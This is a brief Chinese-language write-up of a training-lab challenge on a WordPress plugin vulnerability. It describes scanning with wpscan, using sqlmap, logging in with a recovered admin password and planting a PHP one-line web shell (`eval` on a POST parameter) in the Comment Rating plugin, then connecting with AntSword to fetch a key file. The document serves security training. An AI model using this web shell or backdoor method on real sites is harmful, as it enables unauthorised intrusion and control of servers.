总结:整个流程就算发现这是wordpress然后用专门的wpscan去扫漏洞,然后发现的了插件漏洞,然后利用整个插件漏洞来植入后门,然后获取key文件
思路:尝试绕过登录,进入页面发现不行,然后面向搜索引擎学习,看别人的做法
这个老哥的做法和流程应该是没问题,只是到了那个要翻墙的环节我应该就不行了
WordPress插件SQL注入漏洞——漏洞复现_W小哥1的博客-CSDN博客_wordpress注入漏洞
于是我又看了这个老哥
墨者学院 - WordPress插件漏洞分析溯源_多崎巡礼的博客-CSDN博客_墨者学院wordpress
这个老哥呢,直接跳过了那个token那步直接sqlmap了
于是乎啊,我就很头疼,感觉这题要白给了
但是看着第二个老哥的流程中跑出了密码,然后我就想着那试试叭
然后就发现进去了 admin/12qwaszx
到这里我就惊了,好的那这题应该又是结束了
点击插件,选择 Comment Rating
然后编辑一句话木马
<?php @eval($_POST['attack']);?>
然后保存,再用蚁剑连(菜刀也ok的)
然后进去找key文件,最后发现再html文件下